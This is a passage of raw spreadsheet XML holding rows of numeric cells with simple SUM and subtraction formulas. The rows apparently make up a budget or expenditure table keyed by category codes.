      </c>
      <c r="R577" s="12">
        <f t="shared" si="265"/>
        <v>0</v>
      </c>
      <c r="S577" s="12">
        <v>0</v>
      </c>
      <c r="T577" s="12">
        <v>0</v>
      </c>
      <c r="U577" s="12">
        <v>0</v>
      </c>
      <c r="V577" s="12">
        <v>0</v>
      </c>
      <c r="W577" s="12">
        <v>0</v>
      </c>
      <c r="X577" s="12">
        <v>0</v>
      </c>
      <c r="Y577" s="12">
        <v>0</v>
      </c>
      <c r="Z577" s="12">
        <v>0</v>
      </c>
      <c r="AA577" s="12">
        <v>0</v>
      </c>
      <c r="AB577" s="12">
        <v>0</v>
      </c>
      <c r="AC577" s="12">
        <v>0</v>
      </c>
      <c r="AD577" s="12">
        <v>0</v>
      </c>
      <c r="AE577" s="12">
        <f t="shared" ref="AE577:AP577" si="266">AE578</f>
        <v>0</v>
      </c>
      <c r="AF577" s="12">
        <f t="shared" si="266"/>
        <v>0</v>
      </c>
      <c r="AG577" s="12">
        <f t="shared" si="266"/>
        <v>0</v>
      </c>
      <c r="AH577" s="12">
        <f t="shared" si="266"/>
        <v>0</v>
      </c>
      <c r="AI577" s="12">
        <f t="shared" si="266"/>
        <v>0</v>
      </c>
      <c r="AJ577" s="12">
        <f t="shared" si="266"/>
        <v>0</v>
      </c>
      <c r="AK577" s="12">
        <f t="shared" si="266"/>
        <v>0</v>
      </c>
      <c r="AL577" s="12">
        <f t="shared" si="266"/>
        <v>0</v>
      </c>
      <c r="AM577" s="12">
        <f t="shared" si="266"/>
        <v>0</v>
      </c>
      <c r="AN577" s="12">
        <f t="shared" si="266"/>
        <v>0</v>
      </c>
      <c r="AO577" s="12">
        <f t="shared" si="266"/>
        <v>0</v>
      </c>
      <c r="AP577" s="12">
        <f t="shared" si="266"/>
        <v>0</v>
      </c>
    </row>
    <row r="578" ht="18" customHeight="1" spans="1:42">
      <c r="A578" s="10"/>
      <c r="B578" s="10"/>
      <c r="C578" s="28"/>
      <c r="D578" s="10">
        <v>2080402</v>
      </c>
      <c r="E578" s="16" t="s">
        <v>3397</v>
      </c>
      <c r="F578" s="14">
        <f t="shared" si="246"/>
        <v>0</v>
      </c>
      <c r="G578" s="17"/>
      <c r="H578" s="17"/>
      <c r="I578" s="17"/>
      <c r="J578" s="17"/>
      <c r="K578" s="17"/>
      <c r="L578" s="17"/>
      <c r="M578" s="17"/>
      <c r="N578" s="17"/>
      <c r="O578" s="17"/>
      <c r="P578" s="17"/>
      <c r="Q578" s="17"/>
      <c r="R578" s="17"/>
      <c r="S578" s="17"/>
      <c r="T578" s="17"/>
      <c r="U578" s="17"/>
      <c r="V578" s="17"/>
      <c r="W578" s="17"/>
      <c r="X578" s="17"/>
      <c r="Y578" s="17"/>
      <c r="Z578" s="17"/>
      <c r="AA578" s="17"/>
      <c r="AB578" s="17"/>
      <c r="AC578" s="17"/>
      <c r="AD578" s="17"/>
      <c r="AE578" s="17">
        <f>G578-S578</f>
        <v>0</v>
      </c>
      <c r="AF578" s="17">
        <f t="shared" ref="AF578:AP578" si="267">H578-T578</f>
        <v>0</v>
      </c>
      <c r="AG578" s="17">
        <f t="shared" si="267"/>
        <v>0</v>
      </c>
      <c r="AH578" s="17">
        <f t="shared" si="267"/>
        <v>0</v>
      </c>
      <c r="AI578" s="17">
        <f t="shared" si="267"/>
        <v>0</v>
      </c>
      <c r="AJ578" s="17">
        <f t="shared" si="267"/>
        <v>0</v>
      </c>
      <c r="AK578" s="17">
        <f t="shared" si="267"/>
        <v>0</v>
      </c>
      <c r="AL578" s="17">
        <f t="shared" si="267"/>
        <v>0</v>
      </c>
      <c r="AM578" s="17">
        <f t="shared" si="267"/>
        <v>0</v>
      </c>
      <c r="AN578" s="17">
        <f t="shared" si="267"/>
        <v>0</v>
      </c>
      <c r="AO578" s="17">
        <f t="shared" si="267"/>
        <v>0</v>
      </c>
      <c r="AP578" s="17">
        <f t="shared" si="267"/>
        <v>0</v>
      </c>
    </row>
    <row r="579" ht="18" customHeight="1" spans="1:42">
      <c r="A579" s="10"/>
      <c r="B579" s="10"/>
      <c r="C579" s="28"/>
      <c r="D579" s="10">
        <v>20805</v>
      </c>
      <c r="E579" s="11" t="s">
        <v>3398</v>
      </c>
      <c r="F579" s="14">
        <f t="shared" si="246"/>
        <v>1929</v>
      </c>
      <c r="G579" s="12">
        <f t="shared" ref="G579:R579" si="268">SUM(G580:G587)</f>
        <v>249</v>
      </c>
      <c r="H579" s="12">
        <f t="shared" si="268"/>
        <v>573</v>
      </c>
      <c r="I579" s="12">
        <f t="shared" si="268"/>
        <v>281</v>
      </c>
      <c r="J579" s="12">
        <f t="shared" si="268"/>
        <v>260</v>
      </c>
      <c r="K579" s="12">
        <f t="shared" si="268"/>
        <v>302</v>
      </c>
      <c r="L579" s="12">
        <f t="shared" si="268"/>
        <v>220</v>
      </c>
      <c r="M579" s="12">
        <f t="shared" si="268"/>
        <v>243</v>
      </c>
      <c r="N579" s="12">
        <f t="shared" si="268"/>
        <v>122</v>
      </c>
      <c r="O579" s="12">
        <f t="shared" si="268"/>
        <v>112</v>
      </c>
      <c r="P579" s="12">
        <f t="shared" si="268"/>
        <v>146</v>
      </c>
      <c r="Q579" s="12">
        <f t="shared" si="268"/>
        <v>146</v>
      </c>
      <c r="R579" s="12">
        <f t="shared" si="268"/>
        <v>97</v>
      </c>
      <c r="S579" s="12">
        <v>231</v>
      </c>
      <c r="T579" s="12">
        <v>520</v>
      </c>
      <c r="U579" s="12">
        <v>256</v>
      </c>
      <c r="V579" s="12">
        <v>250</v>
      </c>
      <c r="W579" s="12">
        <v>273</v>
      </c>
      <c r="X579" s="12">
        <v>185</v>
      </c>
      <c r="Y579" s="12">
        <v>225</v>
      </c>
      <c r="Z579" s="12">
        <v>112</v>
      </c>
      <c r="AA579" s="12">
        <v>109</v>
      </c>
      <c r="AB579" s="12">
        <v>127</v>
      </c>
      <c r="AC579" s="12">
        <v>132</v>
      </c>
      <c r="AD579" s="12">
        <v>94</v>
      </c>
      <c r="AE579" s="12">
        <f t="shared" ref="AE579:AP579" si="269">SUM(AE580:AE587)</f>
        <v>18</v>
      </c>
      <c r="AF579" s="12">
        <f t="shared" si="269"/>
        <v>53</v>
      </c>
      <c r="AG579" s="12">
        <f t="shared" si="269"/>
        <v>25</v>
      </c>
      <c r="AH579" s="12">
        <f t="shared" si="269"/>
        <v>10</v>
      </c>
      <c r="AI579" s="12">
        <f t="shared" si="269"/>
        <v>29</v>
      </c>
      <c r="AJ579" s="12">
        <f t="shared" si="269"/>
        <v>35</v>
      </c>
      <c r="AK579" s="12">
        <f t="shared" si="269"/>
        <v>18</v>
      </c>
      <c r="AL579" s="12">
        <f t="shared" si="269"/>
        <v>10</v>
      </c>
      <c r="AM579" s="12">
        <f t="shared" si="269"/>
        <v>3</v>
      </c>
      <c r="AN579" s="12">
        <f t="shared" si="269"/>
        <v>19</v>
      </c>
      <c r="AO579" s="12">
        <f t="shared" si="269"/>
        <v>14</v>
      </c>
      <c r="AP579" s="12">
        <f t="shared" si="269"/>
        <v>3</v>
      </c>
    </row>
    <row r="580" ht="18" customHeight="1" spans="1:42">
      <c r="A580" s="10"/>
      <c r="B580" s="10"/>
      <c r="C580" s="28"/>
      <c r="D580" s="10">
        <v>2080501</v>
      </c>
      <c r="E580" s="16" t="s">
        <v>3399</v>
      </c>
      <c r="F580" s="14">
        <f t="shared" si="246"/>
        <v>434</v>
      </c>
      <c r="G580" s="17">
        <v>53</v>
      </c>
      <c r="H580" s="17">
        <v>62</v>
      </c>
      <c r="I580" s="17">
        <v>103</v>
      </c>
      <c r="J580" s="17">
        <v>70</v>
      </c>
      <c r="K580" s="17"/>
      <c r="L580" s="17">
        <v>75</v>
      </c>
      <c r="M580" s="17">
        <v>47</v>
      </c>
      <c r="N580" s="17">
        <v>23</v>
      </c>
      <c r="O580" s="17">
        <v>21</v>
      </c>
      <c r="P580" s="17">
        <v>74</v>
      </c>
      <c r="Q580" s="17"/>
      <c r="R580" s="17">
        <v>21</v>
      </c>
      <c r="S580" s="17">
        <v>50</v>
      </c>
      <c r="T580" s="17">
        <v>58</v>
      </c>
      <c r="U580" s="17">
        <v>97</v>
      </c>
      <c r="V580" s="17">
        <v>85</v>
      </c>
      <c r="W580" s="17"/>
      <c r="X580" s="17">
        <v>55</v>
      </c>
      <c r="Y580" s="17">
        <v>44</v>
      </c>
      <c r="Z580" s="17">
        <v>21</v>
      </c>
      <c r="AA580" s="17">
        <v>19</v>
      </c>
      <c r="AB580" s="17">
        <v>61</v>
      </c>
      <c r="AC580" s="17"/>
      <c r="AD580" s="17">
        <v>20</v>
      </c>
      <c r="AE580" s="17">
        <f t="shared" ref="AE580:AP587" si="270">G580-S580</f>
        <v>3</v>
      </c>
      <c r="AF580" s="17">
        <f t="shared" si="270"/>
        <v>4</v>
      </c>
      <c r="AG580" s="17">
        <f t="shared" si="270"/>
        <v>6</v>
      </c>
      <c r="AH580" s="17">
        <f t="shared" si="270"/>
        <v>-15</v>
      </c>
      <c r="AI580" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AJ580" s="17">
        <f t="shared" si="270"/>
        <v>20</v>
      </c>
      <c r="AK580" s="17">
        <f t="shared" si="270"/>
        <v>3</v>
      </c>
      <c r="AL580" s="17">
        <f t="shared" si="270"/>
        <v>2</v>
      </c>
      <c r="AM580" s="17">
        <f t="shared" si="270"/>
        <v>2</v>
      </c>
      <c r="AN580" s="17">
        <f t="shared" si="270"/>
        <v>13</v>
      </c>
      <c r="AO580" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AP580" s="17">
        <f t="shared" si="270"/>
        <v>1</v>
      </c>
    </row>
    <row r="581" ht="18" customHeight="1" spans="1:42">
      <c r="A581" s="10"/>
      <c r="B581" s="10"/>
      <c r="C581" s="28"/>
      <c r="D581" s="10">
        <v>2080502</v>
      </c>
      <c r="E581" s="16" t="s">
        <v>3400</v>
      </c>
      <c r="F581" s="14">
        <f t="shared" si="246"/>
        <v>302</v>
      </c>
      <c r="G581" s="17"/>
      <c r="H581" s="17"/>
      <c r="I581" s="17"/>
      <c r="J581" s="17"/>
      <c r="K581" s="17">
        <v>302</v>
      </c>
      <c r="L581" s="17"/>
      <c r="M581" s="17"/>
      <c r="N581" s="17"/>
      <c r="O581" s="17"/>
      <c r="P581" s="17"/>
      <c r="Q581" s="17"/>
      <c r="R581" s="17"/>
      <c r="S581" s="17"/>
      <c r="T581" s="17"/>
      <c r="U581" s="17"/>
      <c r="V581" s="17"/>
      <c r="W581" s="17">
        <v>273</v>
      </c>
      <c r="X581" s="17"/>
      <c r="Y581" s="17"/>
      <c r="Z581" s="17"/>
      <c r="AA581" s="17"/>
      <c r="AB581" s="17"/>
      <c r="AC581" s="17"/>
      <c r="AD581" s="17"/>
      <c r="AE581" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AF581" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AG581" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AH581" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AI581" s="17">
        <f t="shared" si="270"/>
        <v>29</v>
      </c>
      <c r="AJ581" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AK581" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AL581" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AM581" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AN581" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AO581" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AP581" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
    </row>
    <row r="582" ht="18" customHeight="1" spans="1:42">
      <c r="A582" s="10"/>
      <c r="B582" s="10"/>
      <c r="C582" s="28"/>
      <c r="D582" s="10">
        <v>2080503</v>
      </c>
      <c r="E582" s="16" t="s">
        <v>3401</v>
      </c>
      <c r="F582" s="14">
        <f t="shared" ref="F582:F645" si="271">SUM(I582:R582)</f>
        <v>0</v>
      </c>
      <c r="G582" s="17"/>
      <c r="H582" s="17"/>
      <c r="I582" s="17"/>
      <c r="J582" s="17"/>
      <c r="K582" s="17"/>
      <c r="L582" s="17"/>
      <c r="M582" s="17"/>
      <c r="N582" s="17"/>
      <c r="O582" s="17"/>
      <c r="P582" s="17"/>
      <c r="Q582" s="17"/>
      <c r="R582" s="17"/>
      <c r="S582" s="17"/>
      <c r="T582" s="17"/>
      <c r="U582" s="17"/>
      <c r="V582" s="17"/>
      <c r="W582" s="17"/>
      <c r="X582" s="17"/>
      <c r="Y582" s="17"/>
      <c r="Z582" s="17"/>
      <c r="AA582" s="17"/>
      <c r="AB582" s="17"/>
      <c r="AC582" s="17"/>
      <c r="AD582" s="17"/>
      <c r="AE582" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AF582" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AG582" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AH582" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AI582" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AJ582" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AK582" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AL582" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AM582" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AN582" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AO582" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AP582" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
    </row>
    <row r="583" ht="18" customHeight="1" spans="1:42">
      <c r="A583" s="10"/>
      <c r="B583" s="10"/>
      <c r="C583" s="28"/>
      <c r="D583" s="10">
        <v>2080505</v>
      </c>
      <c r="E583" s="16" t="s">
        <v>3402</v>
      </c>
      <c r="F583" s="14">
        <f t="shared" si="271"/>
        <v>1051</v>
      </c>
      <c r="G583" s="17">
        <v>183</v>
      </c>
      <c r="H583" s="17">
        <v>470</v>
      </c>
      <c r="I583" s="17">
        <v>162</v>
      </c>
      <c r="J583" s="17">
        <v>154</v>
      </c>
      <c r="K583" s="17"/>
      <c r="L583" s="61">
        <v>131</v>
      </c>
      <c r="M583" s="17">
        <v>166</v>
      </c>
      <c r="N583" s="17">
        <v>99</v>
      </c>
      <c r="O583" s="17">
        <v>85</v>
      </c>
      <c r="P583" s="17">
        <v>70</v>
      </c>
      <c r="Q583" s="17">
        <v>128</v>
      </c>
      <c r="R583" s="17">
        <v>56</v>
      </c>
      <c r="S583" s="17">
        <v>168</v>
      </c>
      <c r="T583" s="17">
        <v>424</v>
      </c>
      <c r="U583" s="17">
        <v>148</v>
      </c>
      <c r="V583" s="17">
        <v>141</v>
      </c>
      <c r="W583" s="17"/>
      <c r="X583" s="61">
        <v>121</v>
      </c>
      <c r="Y583" s="17">
        <v>153</v>
      </c>
      <c r="Z583" s="17">
        <v>91</v>
      </c>
      <c r="AA583" s="17">
        <v>84</v>
      </c>
      <c r="AB583" s="17">
        <v>65</v>
      </c>
      <c r="AC583" s="17">
        <v>110</v>
      </c>
      <c r="AD583" s="17">
        <v>54</v>
      </c>
      <c r="AE583" s="17">
        <f t="shared" si="270"/>
        <v>15</v>
      </c>
      <c r="AF583" s="17">
        <f t="shared" si="270"/>
        <v>46</v>
      </c>
      <c r="AG583" s="17">
        <f t="shared" si="270"/>
        <v>14</v>
      </c>
      <c r="AH583" s="17">
        <f t="shared" si="270"/>
        <v>13</v>
      </c>
      <c r="AI583" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AJ583" s="17">
        <f t="shared" si="270"/>
        <v>10</v>
      </c>
      <c r="AK583" s="17">
        <f t="shared" si="270"/>
        <v>13</v>
      </c>
      <c r="AL583" s="17">
        <f t="shared" si="270"/>
        <v>8</v>
      </c>
      <c r="AM583" s="17">
        <f t="shared" si="270"/>
        <v>1</v>
      </c>
      <c r="AN583" s="17">
        <f t="shared" si="270"/>
        <v>5</v>
      </c>
      <c r="AO583" s="17">
        <f t="shared" si="270"/>
        <v>18</v>
      </c>
      <c r="AP583" s="17">
        <f t="shared" si="270"/>
        <v>2</v>
      </c>
    </row>
    <row r="584" ht="18" customHeight="1" spans="1:42">
      <c r="A584" s="10"/>
      <c r="B584" s="10"/>
      <c r="C584" s="28"/>
      <c r="D584" s="10">
        <v>2080506</v>
      </c>
      <c r="E584" s="16" t="s">
        <v>3403</v>
      </c>
      <c r="F584" s="14">
        <f t="shared" si="271"/>
        <v>135</v>
      </c>
      <c r="G584" s="17">
        <v>13</v>
      </c>
      <c r="H584" s="17">
        <v>39</v>
      </c>
      <c r="I584" s="17">
        <v>16</v>
      </c>
      <c r="J584" s="17">
        <v>36</v>
      </c>
      <c r="K584" s="17"/>
      <c r="L584" s="17">
        <v>14</v>
      </c>
      <c r="M584" s="17">
        <v>25</v>
      </c>
      <c r="N584" s="17"/>
      <c r="O584" s="17">
        <v>6</v>
      </c>
      <c r="P584" s="17"/>
      <c r="Q584" s="17">
        <v>18</v>
      </c>
      <c r="R584" s="17">
        <v>20</v>
      </c>
      <c r="S584" s="17">
        <v>13</v>
      </c>
      <c r="T584" s="17">
        <v>36</v>
      </c>
      <c r="U584" s="17">
        <v>11</v>
      </c>
      <c r="V584" s="17">
        <v>24</v>
      </c>
      <c r="W584" s="17"/>
      <c r="X584" s="17">
        <v>9</v>
      </c>
      <c r="Y584" s="17">
        <v>23</v>
      </c>
      <c r="Z584" s="17"/>
      <c r="AA584" s="17">
        <v>6</v>
      </c>
      <c r="AB584" s="17"/>
      <c r="AC584" s="17">
        <v>22</v>
      </c>
      <c r="AD584" s="17">
        <v>20</v>
      </c>
      <c r="AE584" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AF584" s="17">
        <f t="shared" si="270"/>
        <v>3</v>
      </c>
      <c r="AG584" s="17">
        <f t="shared" si="270"/>
        <v>5</v>
      </c>
      <c r="AH584" s="17">
        <f t="shared" si="270"/>
        <v>12</v>
      </c>
      <c r="AI584" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AJ584" s="17">
        <f t="shared" si="270"/>
        <v>5</v>
      </c>
      <c r="AK584" s="17">
        <f t="shared" si="270"/>
        <v>2</v>
      </c>
      <c r="AL584" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AM584" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AN584" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AO584" s="17">
        <f t="shared" si="270"/>
        <v>-4</v>
      </c>
      <c r="AP584" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
    </row>
    <row r="585" ht="18" customHeight="1" spans="1:42">
      <c r="A585" s="10"/>
      <c r="B585" s="10"/>
      <c r="C585" s="28"/>
      <c r="D585" s="10">
        <v>2080507</v>
      </c>
      <c r="E585" s="16" t="s">
        <v>3404</v>
      </c>
      <c r="F585" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G585" s="17"/>
      <c r="H585" s="17"/>
      <c r="I585" s="17"/>
      <c r="J585" s="17"/>
      <c r="K585" s="17"/>
      <c r="L585" s="17"/>
      <c r="M585" s="17"/>
      <c r="N585" s="17"/>
      <c r="O585" s="17"/>
      <c r="P585" s="17"/>
      <c r="Q585" s="17"/>
      <c r="R585" s="17"/>
      <c r="S585" s="17"/>
      <c r="T585" s="17"/>
      <c r="U585" s="17"/>
      <c r="V585" s="17"/>
      <c r="W585" s="17"/>
      <c r="X585" s="17"/>
      <c r="Y585" s="17"/>
      <c r="Z585" s="17"/>
      <c r="AA585" s="17"/>
      <c r="AB585" s="17"/>
      <c r="AC585" s="17"/>
      <c r="AD585" s="17"/>
      <c r="AE585" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AF585" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AG585" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AH585" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AI585" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AJ585" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AK585" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AL585" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AM585" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AN585" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AO585" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AP585" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
    </row>
    <row r="586" ht="18" customHeight="1" spans="1:42">
      <c r="A586" s="10"/>
      <c r="B586" s="10"/>
      <c r="C586" s="28"/>
      <c r="D586" s="10">
        <v>2080508</v>
      </c>
      <c r="E586" s="16" t="s">
        <v>3405</v>
      </c>
      <c r="F586" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G586" s="17"/>
      <c r="H586" s="17"/>
      <c r="I586" s="17"/>
      <c r="J586" s="17"/>
      <c r="K586" s="17"/>
      <c r="L586" s="17"/>
      <c r="M586" s="17"/>
      <c r="N586" s="17"/>
      <c r="O586" s="17"/>
      <c r="P586" s="17"/>
      <c r="Q586" s="17"/>
      <c r="R586" s="17"/>
      <c r="S586" s="17"/>
      <c r="T586" s="17"/>
      <c r="U586" s="17"/>
      <c r="V586" s="17"/>
      <c r="W586" s="17"/>
      <c r="X586" s="17"/>
      <c r="Y586" s="17"/>
      <c r="Z586" s="17"/>
      <c r="AA586" s="17"/>
      <c r="AB586" s="17"/>
      <c r="AC586" s="17"/>
      <c r="AD586" s="17"/>
      <c r="AE586" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AF586" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AG586" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AH586" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AI586" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AJ586" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AK586" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AL586" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AM586" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AN586" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AO586" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AP586" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
    </row>
    <row r="587" ht="18" customHeight="1" spans="1:42">
      <c r="A587" s="10"/>
      <c r="B587" s="10"/>
      <c r="C587" s="28"/>
      <c r="D587" s="10">
        <v>2080599</v>
      </c>
      <c r="E587" s="16" t="s">
        <v>3406</v>
      </c>
      <c r="F587" s="14">
        <f t="shared" si="271"/>
        <v>7</v>
      </c>
      <c r="G587" s="17"/>
      <c r="H587" s="17">
        <v>2</v>
      </c>
      <c r="I587" s="17"/>
      <c r="J587" s="17"/>
      <c r="K587" s="17"/>
      <c r="L587" s="17"/>
      <c r="M587" s="17">
        <v>5</v>
      </c>
      <c r="N587" s="17"/>
      <c r="O587" s="17"/>
      <c r="P587" s="17">
        <v>2</v>
      </c>
      <c r="Q587" s="17"/>
      <c r="R587" s="17"/>
      <c r="S587" s="17"/>
      <c r="T587" s="17">
        <v>2</v>
      </c>
      <c r="U587" s="17"/>
      <c r="V587" s="17"/>
      <c r="W587" s="17"/>
      <c r="X587" s="17"/>
      <c r="Y587" s="17">
        <v>5</v>
      </c>
      <c r="Z587" s="17"/>
      <c r="AA587" s="17"/>
      <c r="AB587" s="17">
        <v>1</v>
      </c>
      <c r="AC587" s="17"/>
      <c r="AD587" s="17"/>
      <c r="AE587" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AF587" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AG587" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AH587" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AI587" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AJ587" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AK587" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AL587" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AM587" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AN587" s="17">
        <f t="shared" si="270"/>
        <v>1</v>
      </c>
      <c r="AO587" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
      <c r="AP587" s="17">
        <f t="shared" si="270"/>
        <v>0</v>
      </c>
    </row>
    <row r="588" ht="18" customHeight="1" spans="1:42">
      <c r="A588" s="10"/>
      <c r="B588" s="10"/>
      <c r="C588" s="28"/>
      <c r="D588" s="10">
        <v>20806</v>
      </c>
      <c r="E588" s="11" t="s">
        <v>3407</v>
      </c>
      <c r="F588" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G588" s="12">
        <f t="shared" ref="G588:R588" si="272">SUM(G589:G591)</f>
        <v>0</v>
      </c>
      <c r="H588" s="12">
        <f t="shared" si="272"/>
        <v>0</v>
      </c>
      <c r="I588" s="12">
        <f t="shared" si="272"/>
        <v>0</v>
      </c>
      <c r="J588" s="12">
        <f t="shared" si="272"/>
        <v>0</v>
      </c>
      <c r="K588" s="12">
        <f t="shared" si="272"/>
        <v>0</v>
      </c>
      <c r="L588" s="12">
        <f t="shared" si="272"/>
        <v>0</v>
      </c>
      <c r="M588" s="12">
        <f t="shared" si="272"/>
        <v>0</v>
      </c>
      <c r="N588" s="12">
        <f t="shared" si="272"/>
        <v>0</v>
      </c>
      <c r="O588" s="12">
        <f t="shared" si="272"/>
        <v>0</v>
      </c>
      <c r="P588" s="12">
        <f t="shared" si="272"/>
        <v>0</v>
      </c>
      <c r="Q588" s="12">
        <f t="shared" si="272"/>
        <v>0</v>
      </c>
      <c r="R588" s="12">
        <f t="shared" si="272"/>
        <v>0</v>
      </c>
      <c r="S588" s="12">
        <v>0</v>
      </c>
      <c r="T588" s="12">
        <v>0</v>
      </c>
      <c r="U588" s="12">
        <v>0</v>
      </c>
      <c r="V588" s="12">
        <v>0</v>
      </c>
      <c r="W588" s="12">
        <v>0</v>
      </c>
      <c r="X588" s="12">
        <v>0</v>
      </c>
      <c r="Y588" s="12">
        <v>0</v>
      </c>
      <c r="Z588" s="12">
        <v>0</v>
      </c>
      <c r="AA588" s="12">
        <v>0</v>
      </c>
      <c r="AB588" s="12">
        <v>0</v>
      </c>
      <c r="AC588" s="12">
        <v>0</v>
      </c>
      <c r="AD588" s="12">
        <v>0</v>
      </c>
      <c r="AE588" s="12">
        <f t="shared" ref="AE588:AP588" si="273">SUM(AE589:AE591)</f>
        <v>0</v>
      </c>
      <c r="AF588" s="12">
        <f t="shared" si="273"/>
        <v>0</v>
      </c>
      <c r="AG588" s="12">
        <f t="shared" si="273"/>
        <v>0</v>
      </c>
      <c r="AH588" s="12">
        <f t="shared" si="273"/>
        <v>0</v>
      </c>
      <c r="AI588" s="12">
        <f t="shared" si="273"/>
        <v>0</v>
      </c>
      <c r="AJ588" s="12">
        <f t="shared" si="273"/>
        <v>0</v>
      </c>
      <c r="AK588" s="12">
        <f t="shared" si="273"/>
        <v>0</v>
      </c>
      <c r="AL588" s="12">
        <f t="shared" si="273"/>
        <v>0</v>
      </c>
      <c r="AM588" s="12">
        <f t="shared" si="273"/>
        <v>0</v>
      </c>
      <c r="AN588" s="12">
        <f t="shared" si="273"/>
        <v>0</v>
      </c>
      <c r="AO588" s="12">
        <f t="shared" si="273"/>
        <v>0</v>
      </c>
      <c r="AP588" s="12">
        <f t="shared" si="273"/>
        <v>0</v>
      </c>
    </row>
    <row r="589" ht="18" customHeight="1" spans="1:42">
      <c r="A589" s="10"/>
      <c r="B589" s="10"/>
      <c r="C589" s="28"/>
      <c r="D589" s="10">
        <v>2080601</v>
      </c>
      <c r="E589" s="16" t="s">
        <v>3408</v>
      </c>
      <c r="F589" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G589" s="17"/>
      <c r="H589" s="17"/>
      <c r="I589" s="17"/>
      <c r="J589" s="17"/>
      <c r="K589" s="17"/>
      <c r="L589" s="17"/>
      <c r="M589" s="17"/>
      <c r="N589" s="17"/>
      <c r="O589" s="17"/>
      <c r="P589" s="17"/>
      <c r="Q589" s="17"/>
      <c r="R589" s="17"/>
      <c r="S589" s="17"/>
      <c r="T589" s="17"/>
      <c r="U589" s="17"/>
      <c r="V589" s="17"/>
      <c r="W589" s="17"/>
      <c r="X589" s="17"/>
      <c r="Y589" s="17"/>
      <c r="Z589" s="17"/>
